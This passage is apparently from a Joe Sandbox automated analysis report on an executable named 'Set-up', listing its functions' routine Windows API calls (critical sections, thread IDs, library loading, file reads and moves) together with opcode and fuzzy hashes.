                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E66088
                                                                                                                                  • new.LIBCMT ref: 00E660A5
                                                                                                                                    • Part of subcall function 00E675E0: EnterCriticalSection.KERNEL32(0131BE48,460C02D8,?), ref: 00E67618
                                                                                                                                    • Part of subcall function 00E675E0: GetCurrentThreadId.KERNEL32 ref: 00E67629
                                                                                                                                    • Part of subcall function 00E675E0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E67653
                                                                                                                                    • Part of subcall function 00E675E0: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E67664
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E66117
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread$Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065089518-0
                                                                                                                                  • Opcode ID: 20c83404422e0820cd2efb834be6b20bb4f263cb3092071acd4f7aafa5d76501
                                                                                                                                  • Instruction ID: e96318e1d1cdbb1be60c317d37e3be165efe5f642c15bf22f52d42bd4638402c
                                                                                                                                  • Opcode Fuzzy Hash: 20c83404422e0820cd2efb834be6b20bb4f263cb3092071acd4f7aafa5d76501
                                                                                                                                  • Instruction Fuzzy Hash: C0210571806289EFD725DFA8E51978DFFF8EF05318F1041AAD424A7385D7B51608CBA2
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E704F7
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E70508
                                                                                                                                  • new.LIBCMT ref: 00E70522
                                                                                                                                    • Part of subcall function 00E709C0: EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E709F8
                                                                                                                                    • Part of subcall function 00E709C0: GetCurrentThreadId.KERNEL32 ref: 00E70A09
                                                                                                                                    • Part of subcall function 00E709C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E70A33
                                                                                                                                    • Part of subcall function 00E709C0: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E70A44
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E7058E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread$Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065089518-0
                                                                                                                                  • Opcode ID: 43737f43dadcb31c5815e0712bbcb4480e02833bd85ec095487436f3e348630c
                                                                                                                                  • Instruction ID: 969289578ee3f122141923fd72c2917c4aab2ed9a5171fd44ed83da5eb036b78
                                                                                                                                  • Opcode Fuzzy Hash: 43737f43dadcb31c5815e0712bbcb4480e02833bd85ec095487436f3e348630c
                                                                                                                                  • Instruction Fuzzy Hash: 7F210170806289DFD725DFA8D65878DFFF8EF11318F10119AD418A7385C3B51608CBA2
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E5C747
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E5C758
                                                                                                                                  • new.LIBCMT ref: 00E5C772
                                                                                                                                    • Part of subcall function 00E5C580: EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00E5C5B8
                                                                                                                                    • Part of subcall function 00E5C580: GetCurrentThreadId.KERNEL32 ref: 00E5C5C9
                                                                                                                                    • Part of subcall function 00E5C580: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5C5F3
                                                                                                                                    • Part of subcall function 00E5C580: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E5C604
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E5C7DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread$Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065089518-0
                                                                                                                                  • Opcode ID: 5d2b69cf33882c2cffd9592b6f7c041a130dc42827cfbf63e5fa6411c566092b
                                                                                                                                  • Instruction ID: e2363d43082fbd730470d965fd756f12d5c8a2840eaf9cae4f3de93a299ae84e
                                                                                                                                  • Opcode Fuzzy Hash: 5d2b69cf33882c2cffd9592b6f7c041a130dc42827cfbf63e5fa6411c566092b
                                                                                                                                  • Instruction Fuzzy Hash: 07212371805289EFC719CFA8D40878DFFF8EF06319F10029AD410A7385D3B52A08CBA1
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48), ref: 00E84A46
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E84A57
                                                                                                                                  • new.LIBCMT ref: 00E84A71
                                                                                                                                    • Part of subcall function 00F05960: InitializeCriticalSection.KERNEL32(00000008,00000000,460C02D8,00000000), ref: 00F059A9
                                                                                                                                    • Part of subcall function 00F05960: InitializeCriticalSection.KERNEL32(00000020), ref: 00F059BD
                                                                                                                                    • Part of subcall function 00F05960: GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemTimePreciseAsFileTime), ref: 00F059F1
                                                                                                                                    • Part of subcall function 00F05960: GetProcAddress.KERNEL32(00000000), ref: 00F059F8
                                                                                                                                    • Part of subcall function 00F05960: GetSystemTimeAsFileTime.KERNEL32(00000048), ref: 00F05A09
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E84ACA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$InitializeTime$AddressCurrentEnterFileHandleLeaveModuleProcSystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1387877749-0
                                                                                                                                  • Opcode ID: 3c966ce6d5acfd79567572dec118f05e26a2cf64ceb71096621fb3f22c6ce3b6
                                                                                                                                  • Instruction ID: 9eabd2954f741063b0c501084bd1909a4a0da26a280af30bd7efebfac2122246
                                                                                                                                  • Opcode Fuzzy Hash: 3c966ce6d5acfd79567572dec118f05e26a2cf64ceb71096621fb3f22c6ce3b6
                                                                                                                                  • Instruction Fuzzy Hash: 59112671C05289EFDB25EB68E50939DBBF8EB05718F00019AD818A73C5D7B52A04C7A2
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,01129DDF,00000000,00000000,00000000,00000000,?,0112A0BD,00000006,FlsSetValue), ref: 01129E6A
                                                                                                                                  • GetLastError.KERNEL32(?,01129DDF,00000000,00000000,00000000,00000000,?,0112A0BD,00000006,FlsSetValue,011CB13C,011CB144,00000000,00000364,?,01129707), ref: 01129E76
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,01129DDF,00000000,00000000,00000000,00000000,?,0112A0BD,00000006,FlsSetValue,011CB13C,011CB144,00000000), ref: 01129E84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                  • Opcode ID: 297a1237bcb0bee1188e31af6b6c396d4c8c2f3b0b5d24d9b8b38509ed198f77
                                                                                                                                  • Instruction ID: 97dd498fda5e2b5d966f99f1464104cd7dfe459daffd51342cace2f1668a54ba
                                                                                                                                  • Opcode Fuzzy Hash: 297a1237bcb0bee1188e31af6b6c396d4c8c2f3b0b5d24d9b8b38509ed198f77
                                                                                                                                  • Instruction Fuzzy Hash: CA012B3661123BABD73E5A6CEC84E573B98AF45B65F110630FA16D7144D730E450C7E0
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48), ref: 00F134B6
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F134C7
                                                                                                                                  • new.LIBCMT ref: 00F134E1
                                                                                                                                    • Part of subcall function 00F12FC0: QueryPerformanceFrequency.KERNEL32(00000000,00000000,00000000), ref: 00F12FDD
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13530
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterFrequencyLeavePerformanceQueryThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 477647683-0
                                                                                                                                  • Opcode ID: bd9200e7fb5153840968754d77404abfe008a086306c3d0ba0c75172ea775f7a
                                                                                                                                  • Instruction ID: 4524786c49ecc0e3d61fc29ebf50d86e530f61ecd54a04252f4a2a6e23a4be86
                                                                                                                                  • Opcode Fuzzy Hash: bd9200e7fb5153840968754d77404abfe008a086306c3d0ba0c75172ea775f7a
                                                                                                                                  • Instruction Fuzzy Hash: F711C471C0A289DFDB25DFA8D50979DBFF8EF05718F10019AE414A7389C7B52A44C7A2
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00F13338
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F13349
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F13373
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13384
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: c73797d92c0a89e3d8b13a98985883f341c9d868fab1df29216f0f8810bd6c5a
                                                                                                                                  • Instruction ID: 9bcf0ffa00db939142430bc27d9fdac7b531078a38801d13923f42b4e76bd8ff
                                                                                                                                  • Opcode Fuzzy Hash: c73797d92c0a89e3d8b13a98985883f341c9d868fab1df29216f0f8810bd6c5a
                                                                                                                                  • Instruction Fuzzy Hash: 5C115E71905259DFCB15DFA8D845B9DBBF8FB09714F00066AE525E3384DBB46604CBA0
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,?), ref: 00E67618
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E67629
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E67653
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E67664
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 5381a779739f4028d1d407bd30336b21ed723e9052a5fa981489a9a3a1805d6d
                                                                                                                                  • Instruction ID: c05182ac0c1a1a1410bfbb65ec741a801fabcb1e23a0cf94f737a642621a4940
                                                                                                                                  • Opcode Fuzzy Hash: 5381a779739f4028d1d407bd30336b21ed723e9052a5fa981489a9a3a1805d6d
                                                                                                                                  • Instruction Fuzzy Hash: 0F11AD71904289DFCB15DFA8D809B9EBBF8FB09714F00066AE425F3384D7B46604CBA0
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00E5C5B8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E5C5C9
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5C5F3
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E5C604
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 5f931fa1750f0895cfacca5e7ebc661c2e17239c2fff21a6b89c6b69cfc94ff4
                                                                                                                                  • Instruction ID: 2c1a9dcb007a1a4f89d2d88cdc76b56299928c551c41a0f50148f901f149a700
                                                                                                                                  • Opcode Fuzzy Hash: 5f931fa1750f0895cfacca5e7ebc661c2e17239c2fff21a6b89c6b69cfc94ff4
                                                                                                                                  • Instruction Fuzzy Hash: 7711A171904249DFCB14DFA8D805B9DBBF8FB09714F00066AE821F3384D7B46604CBA0
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E709F8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E70A09
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E70A33
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E70A44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: ac388aa530ad62b960e20b6b91a04335315d96c09804d3ab4e5c508b431099a2
                                                                                                                                  • Instruction ID: bd4dcc4f29918680de97abb79119826033343e0bae93c1192eee47a4b652269f
                                                                                                                                  • Opcode Fuzzy Hash: ac388aa530ad62b960e20b6b91a04335315d96c09804d3ab4e5c508b431099a2
                                                                                                                                  • Instruction Fuzzy Hash: 28116171904259DFCB15DFA8D845B9DFBF8FB09714F00466AE425E3384D7B46504CBA1
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 010278C8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 010278D9
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 01027903
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 01027914
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 7a6097228b40d4cd6126009fa436da3eacef3b3f64574c6a0a2d4114a6ed088b
                                                                                                                                  • Instruction ID: c1295f1a3412e825a5a9db1e37c7948b35807b1f9d7c9f76c5f1eb6f895c8d40
                                                                                                                                  • Opcode Fuzzy Hash: 7a6097228b40d4cd6126009fa436da3eacef3b3f64574c6a0a2d4114a6ed088b
                                                                                                                                  • Instruction Fuzzy Hash: 7E11A171904259DFCB15DFA8D809B9DBBF8FB09714F00026AE521E3384D7B46604CBA0
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00F05BF8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F05C09
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F05C33
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F05C44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 491f00ff786a0114fe423a04303d2b14d0d632cb5a81ab064b8be9d4124aa1ed
                                                                                                                                  • Instruction ID: 0dc5486901f4c8ea3a5212211de1f1dc3e95c2c42af7cce4e09e839ee7d822cd
                                                                                                                                  • Opcode Fuzzy Hash: 491f00ff786a0114fe423a04303d2b14d0d632cb5a81ab064b8be9d4124aa1ed
                                                                                                                                  • Instruction Fuzzy Hash: 0911E171D04248DFCB14CFA8D909B9EBBF8FB09714F00026AE410E3384D7B46604CBA0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b028ccb2e0fb4489a4ceecc5d7cec404ff104e26b57f1858adcb8492d5845042
                                                                                                                                  • Instruction ID: 8c92346ce844c4256cbe48d122fc3467792f0a53eee0d769cae493c76eeaf695
                                                                                                                                  • Opcode Fuzzy Hash: b028ccb2e0fb4489a4ceecc5d7cec404ff104e26b57f1858adcb8492d5845042
                                                                                                                                  • Instruction Fuzzy Hash: B4F0ECB26DC2040BEB1CE7747856D6F77848BB4398F04163AF22BD63D0F622E955C156
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E63EE5
                                                                                                                                  • GetConsoleOutputCP.KERNEL32 ref: 00E63F08
                                                                                                                                  • GetACP.KERNEL32 ref: 00E63F12
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E63F30
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$ConsoleEnterLeaveOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3197396585-0
                                                                                                                                  • Opcode ID: 5dc12903e342c9c0a91cd960521f5893982a68df4f37d92d87f1e9b6f68c0c1c
                                                                                                                                  • Instruction ID: e959fa323fa91c5f74a5b4c1e7d5b4ff77cea320d51ffc0d34b126f6aa3779b4
                                                                                                                                  • Opcode Fuzzy Hash: 5dc12903e342c9c0a91cd960521f5893982a68df4f37d92d87f1e9b6f68c0c1c
                                                                                                                                  • Instruction Fuzzy Hash: 02017570945284DFCB25CFB5E448758BFB8EB06729F10436EE825A37C9C7B52944CB51
                                                                                                                                  APIs
                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00E6BFB9
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6C03B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastMove
                                                                                                                                  • String ID: MoveFileW()
                                                                                                                                  • API String ID: 55378915-1661149990
                                                                                                                                  • Opcode ID: 569610fc0c66c21f91fcdd914b835ad9ae72f4a980bf24ad610dc0ac3992a64c
                                                                                                                                  • Instruction ID: d38c579340c74801de85649cb9762f3f1e4df19d663c24d38dfc1f601563f115
                                                                                                                                  • Opcode Fuzzy Hash: 569610fc0c66c21f91fcdd914b835ad9ae72f4a980bf24ad610dc0ac3992a64c
                                                                                                                                  • Instruction Fuzzy Hash: 45514B70A05249EFDF14DFA5D958BAEBBF5BF04304F144069E411BB280D77A9A08CBA1
                                                                                                                                  APIs
                                                                                                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00E61033
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E619D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCriticalEventsInputLeaveNumberSection
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 1692730731-336475711
                                                                                                                                  • Opcode ID: e8dba247cce0ded63a73a23ed4f3cfd7ba8d0e0797c80d2ab6c418eb720f6c23
                                                                                                                                  • Instruction ID: d599e6147f8e3fbf0bab8683734f4ecfa1807819c1ac571b2e69ef139f330480
                                                                                                                                  • Opcode Fuzzy Hash: e8dba247cce0ded63a73a23ed4f3cfd7ba8d0e0797c80d2ab6c418eb720f6c23
                                                                                                                                  • Instruction Fuzzy Hash: D7412970E44288DEDF36DB64E4547EEBBB4AF51388F0820D9D455B3281DB305A88CB61
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E8D031
                                                                                                                                    • Part of subcall function 00E8D4A0: Concurrency::cancel_current_task.LIBCPMT ref: 00E8D50C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: !af_$ncvector<unsigned long>::push_back
                                                                                                                                  • API String ID: 118556049-784343616
                                                                                                                                  • Opcode ID: aba00813030652204f0189f98b5eb4e7fbf0d0efbab27c872d1d4a4ad5cd47d9
                                                                                                                                  • Instruction ID: 97a403adbd200478092349ea3f9baad944dbaf53ba1076efc94558fa0cd0dabc
                                                                                                                                  • Opcode Fuzzy Hash: aba00813030652204f0189f98b5eb4e7fbf0d0efbab27c872d1d4a4ad5cd47d9
                                                                                                                                  • Instruction Fuzzy Hash: 1411E771954219AFCB24EF58DC02F9AB7ECEB05B24F00026AF924A73C1DBB169008790
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • ncvector<class CmdLine::ItemData>::push_back, xrefs: 00E581A2
                                                                                                                                  • !af_, xrefs: 00E581A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$ncvector<class CmdLine::ItemData>::push_back
                                                                                                                                  • API String ID: 0-1819047494
                                                                                                                                  • Opcode ID: 56c84d16f12a0b2559617c74d8a73b00f6971282303956698a207da5bf74ef4e
                                                                                                                                  • Instruction ID: 87c396f00362c1281f45a170681403dc510efe533a6899d3e650c1ab5a1a0a7e
                                                                                                                                  • Opcode Fuzzy Hash: 56c84d16f12a0b2559617c74d8a73b00f6971282303956698a207da5bf74ef4e
                                                                                                                                  • Instruction Fuzzy Hash: C901D2B1A44649EFDB24DF54D902B69B7E8E714B24F10466EED11A77C0EB762A00CB90
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • ncvector<class basic_ncstring<wchar_t> >::push_back, xrefs: 00E4D492
                                                                                                                                  • !af_, xrefs: 00E4D497
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$ncvector<class basic_ncstring<wchar_t> >::push_back
                                                                                                                                  • API String ID: 0-799122685
                                                                                                                                  • Opcode ID: 39c35b83d6a2b092523cea4c9907369db9f4effa3feeb9eedb877f6a9c54e1b6
                                                                                                                                  • Instruction ID: 26f9473d20c0ce62f26063e3c5f1eec87e9df5433422767a0c62026087a49a81
                                                                                                                                  • Opcode Fuzzy Hash: 39c35b83d6a2b092523cea4c9907369db9f4effa3feeb9eedb877f6a9c54e1b6
                                                                                                                                  • Instruction Fuzzy Hash: 3701DDB1A58248AFD724DF54EC11B99F7E8E714724F10467FE860A77C0EBB5691087D0
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 00E486EB
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E486F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                  • String ID: ReadFile()
                                                                                                                                  • API String ID: 1948546556-1174911424
                                                                                                                                  • Opcode ID: 89d1ca83e9e8d73be12ff0fc0eddaa1b8e10a28a4b8e393baad01d9468568f6f
                                                                                                                                  • Instruction ID: a9b1fb01a0e53b9963a559616e60360484e49af87574bba08ff7c04c29445e25
                                                                                                                                  • Opcode Fuzzy Hash: 89d1ca83e9e8d73be12ff0fc0eddaa1b8e10a28a4b8e393baad01d9468568f6f
